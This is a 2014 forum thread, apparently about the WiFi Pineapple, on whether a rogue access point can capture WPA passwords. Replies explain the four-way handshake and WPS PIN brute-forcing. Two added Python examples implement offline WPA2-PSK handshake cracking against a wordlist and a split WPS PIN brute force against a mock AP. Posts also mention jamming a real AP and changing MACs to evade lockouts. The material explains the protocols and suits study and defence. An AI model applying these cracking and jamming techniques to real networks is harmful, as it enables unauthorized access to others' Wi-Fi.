steve3333 Posted May 22, 2014
Hi everybody, I upgraded my firmware to 1.4.0 and it's very nice, thank you guys for that. Now that we can create an AP with WPA or WPA2, would it be possible to get the passwords that people are using to try to connect to it? For example, if you want to get the password for the AP "NETWORK", you would create an AP named "NETWORK" on the Pineapple with WPA encryption, then jam the real AP "NETWORK" and hope for the target to try to connect to the Pineapple's "NETWORK" with his password, and then we would have it... I'm not sure if this is actually possible, but if it is... it could be useful :) What do you guys think?
Oli Posted May 22, 2014
No, this is not possible.
steve3333 (Author) Posted May 22, 2014
Not possible with the actual firmware and tools we have? Or not possible ever? And why not? Could we get around it? Sorry, but "No, this is not possible." is something that, if we were blindly believing it, well, we wouldn't be here, right?
Sebkinne Posted May 22, 2014
No, this is not possible.
To elaborate on this short reply: it is not possible because this isn't how WPA works. The password is never actually transmitted. Instead, a four-way handshake is done to establish a connection. You could capture the WPA handshake using your WiFi Pineapple MKV and then brute-force it on a powerful machine -- but this is simply brute-forcing. If you want to know more on the subject, I suggest you read up about WPA/WPA2 and the four-way handshake.
Best Regards,
Sebkinne
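An added example (not code from this thread or from the Pineapple firmware) showing what Sebkinne describes: the station proves knowledge of the PSK with a MIC over its handshake message, so a sniffer sees MAC addresses, two nonces and a MIC but never the passphrase, and the only thing left is to derive candidate PMKs offline and compare MICs, which is what aircrack-ng does. The SSID, MACs, nonces, passphrase and the minimal EAPOL-Key message 2 layout are constructed for the example; the PBKDF2 and PRF-512 derivations are the standard WPA2-PSK ones. Only the WPA2 (HMAC-SHA1) MIC is implemented.

```python
"""Added example: why a WPA-PSK capture yields a MIC, not a password, and how the
offline brute force works. Everything in the sample handshake is constructed."""
import hashlib
import hmac
import os

# Offset of the 16-byte Key MIC field in an EAPOL-Key frame: 4-byte 802.1X header, then
# descriptor type (1), key info (2), key length (2), replay counter (8), key nonce (32),
# key IV (16), key RSC (8), key ID (8).
MIC_OFFSET = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8  # = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # four 160-bit SHA1 outputs, truncated to 512 bits
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key MIC for WPA2 (key descriptor version 2): HMAC-SHA1 over the EAPOL-Key frame
    with the MIC field zeroed, truncated to 128 bits. WPA/TKIP (version 1) uses HMAC-MD5."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_msg2_frame(snonce: bytes) -> bytes:
    """Constructed, minimal EAPOL-Key message 2 (station -> AP) with an all-zero MIC field."""
    body = (b"\x02"                   # descriptor type: RSN
            + b"\x01\x0a"             # key info: MIC set, pairwise, descriptor version 2
            + b"\x00\x10"             # key length
            + b"\x00" * 7 + b"\x01"   # replay counter
            + snonce                  # key nonce = SNonce
            + b"\x00" * 16            # key IV
            + b"\x00" * 8             # key RSC
            + b"\x00" * 8             # key ID
            + b"\x00" * 16            # key MIC (zero while computing)
            + b"\x00\x00")            # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v1, type EAPOL-Key


def four_way_handshake(passphrase, ssid, ap_mac, sta_mac, anonce=None, snonce=None):
    """Run the station side of messages 1-2 and return only what a sniffer sees.
    The passphrase itself never appears in the returned capture."""
    anonce = anonce or os.urandom(32)   # message 1: AP -> station
    snonce = snonce or os.urandom(32)   # message 2: station -> AP, MIC'd with the KCK
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    frame = build_msg2_frame(snonce)
    frame = frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap": ap_mac, "sta": sta_mac, "anonce": anonce, "snonce": snonce, "eapol": frame}


def crack_handshake(capture, wordlist):
    """Offline check of candidate passphrases against the captured MIC."""
    frame = capture["eapol"]
    mic = frame[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = derive_ptk(pmk, capture["ap"], capture["sta"], capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), mic):
            return candidate
    return None


if __name__ == "__main__":
    ap, sta = bytes.fromhex("00c0ca000001"), bytes.fromhex("001122334455")  # constructed MACs
    cap = four_way_handshake("correct-horse-2014", "NETWORK", ap, sta)
    assert b"correct-horse-2014" not in cap["eapol"]  # only nonces, MACs and a MIC go over the air
    print(crack_handshake(cap, ["password", "letmein", "correct-horse-2014"]))
```

The cost of the attack is the 4096-iteration PBKDF2 per candidate, which is why it is done on the "big boy at home" rather than on the Pineapple; a rogue AP with the same SSID gets you a message 2 with a MIC to crack, not a password.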
steve3333 (Author) Posted May 22, 2014
Thank you, I will. What would be more efficient then: reaver or brute-forcing the handshake? Wouldn't it be worth it to look into it? There aren't many ways to crack WPA, at least from what I know, so maybe that could be worth it? An infusion getting the handshakes, then sending them to the big boy at home?
cooper Posted May 22, 2014
Start by reading the 'brute force attack' chapter of this Wikipedia article. You'd assume the PIN was sent from client to server in some way if the router can tell the client which half of the PIN was wrong, but if Seb says otherwise I'm inclined to believe him. I can't really find a good quick (i.e. not the spec) description of this particular bit of the protocol to prove it either way, and I'm an utter noob when it comes to this sort of thing.
What I can tell you is this: when you don't have a valid handshake, you need to do what the Wikipedia article says. Due to general idiocy when it comes to the validation algorithm, WPS's valid keyspace has gone from 10^8 to just 11000 possibilities. If the router shuts down access to WPS after X failed attempts for a duration of Y minutes, you can successfully brute-force the router in 11000/(X*24*(60/Y)) days. Some common examples (rounding up):
1 failed attempt = 5 minute delay => 38.2 days
3 failed attempts = 5 minute delay => 12.8 days
3 failed attempts = 15 minute delay => 38.2 days
By comparison, an unprotected WPS for which we'll assume it manages 1 PIN per second (i.e. SLOW) can be brute-forced like this in about an hour.
Also note that the numbers given are your worst-case scenarios, where you had to run through the ENTIRE keyspace. There's a good chance you won't need that much.
Things to test for when trying this: is WPS turned off completely, or does the MAC simply get blacklisted? In case of blacklisting, try until blacklisted, change MAC, continue.
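An added example (not code from this thread or from reaver) of the two facts behind cooper's numbers: the eighth PIN digit is a checksum of the other seven, and the AP validates the two halves separately, so a brute force needs at most 10^4 + 10^3 = 11000 attempts instead of 10^8. The AP below is a constructed stand-in that only mimics the half-by-half NACK behaviour; the PIN 12345670 and the lockout parameters are example values, and the days formula is the one from the post.

```python
"""Added example: WPS PIN checksum, the split (M4/M6) brute force and the lockout
arithmetic. The AP is a constructed mock, not a real WPS implementation."""


def wps_checksum(first7: int) -> int:
    """Check digit of a WPS PIN: digits 1..7 weighted 3,1,3,1,3,1,3, summed mod 10.
    Same algorithm reaver uses to generate candidate PINs."""
    acc = 0
    while first7:
        acc += 3 * (first7 % 10)
        first7 //= 10
        acc += first7 % 10
        first7 //= 10
    return (10 - acc % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class MockWpsAp:
    """Constructed stand-in for a WPS AP in an external-registrar exchange. As in the
    real protocol it checks the PIN in two halves: a wrong first half is answered with
    a NACK after M4, a wrong second half with a NACK after M6. No lockout is modelled."""

    def __init__(self, pin: str):
        assert is_valid_wps_pin(pin)
        self.first, self.second = int(pin[:4]), int(pin[4:])
        self.attempts = 0

    def try_pin(self, first: int, second: int) -> str:
        self.attempts += 1
        if first != self.first:
            return "NACK after M4"
        if second != self.second:
            return "NACK after M6"
        return "M7 (PIN accepted)"


def split_bruteforce(ap: MockWpsAp):
    """At most 10^4 tries for the first half, then at most 10^3 for the second
    (only three of its four digits are free, the fourth is the checksum)."""
    for first in range(10_000):
        if ap.try_pin(first, 0) != "NACK after M4":
            break
    else:
        return None
    for free3 in range(1_000):
        second = free3 * 10 + wps_checksum(first * 1000 + free3)
        if ap.try_pin(first, second).startswith("M7"):
            return f"{first:04d}{second:04d}"
    return None


WPS_KEYSPACE = 10**4 + 10**3  # 11000, the worst case for the split attack


def worst_case_days(failed_attempts_before_lockout: int, lockout_minutes: float) -> float:
    """Formula from the post: 11000 / (X * 24 * (60 / Y)) with X tries per Y-minute lockout."""
    attempts_per_day = failed_attempts_before_lockout * 24 * (60 / lockout_minutes)
    return WPS_KEYSPACE / attempts_per_day


def worst_case_seconds_unthrottled(pins_per_second: float = 1.0) -> float:
    """Worst case with no lockout at all, at a given PIN rate."""
    return WPS_KEYSPACE / pins_per_second


if __name__ == "__main__":
    ap = MockWpsAp("12345670")  # constructed example PIN
    print(split_bruteforce(ap), "found in", ap.attempts, "attempts of at most", WPS_KEYSPACE)
    for x, y in ((1, 5), (3, 5), (3, 15)):
        print(f"{x} failure(s) -> {y} min lockout: {worst_case_days(x, y):.1f} days worst case")
    print(f"unthrottled at 1 PIN/s: {worst_case_seconds_unthrottled(1.0):.0f} s")
```

Without the split validation the mock AP would need up to 10^7 attempts (10^8 PINs, of which one in ten has a valid checksum); with it, the worst case is 11000, which at one PIN per second is 11000 seconds.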
Darren Kitchen Posted May 23, 2014
This is why: It's actually rather elegant. Here's an old Hak5 episode on the topic:
fringes Posted May 26, 2014
> Here's an old Hak5 episode on the topic:
That link didn't show up in my browser. How odd is that?
barry99705 Posted May 26, 2014
> That link didn't show up in my browser. How odd is that?
It's a Chrome issue. Works just fine in internet exploder.
fringes Posted May 27, 2014
Interesting. I don't use IE, but it showed up in Mantra, a Firefox derivative. It didn't show up for me in Chrome, Iceweasel, or Firefox though. Well, anyone that didn't see it has it now.
mod Posted April 10, 2015
Hi Seb and Darren. Once the handshake is collected on the Pineapple, how do I transfer it to my PC for processing? Probably a silly question.
mod Posted April 11, 2015
Got it: WinSCP.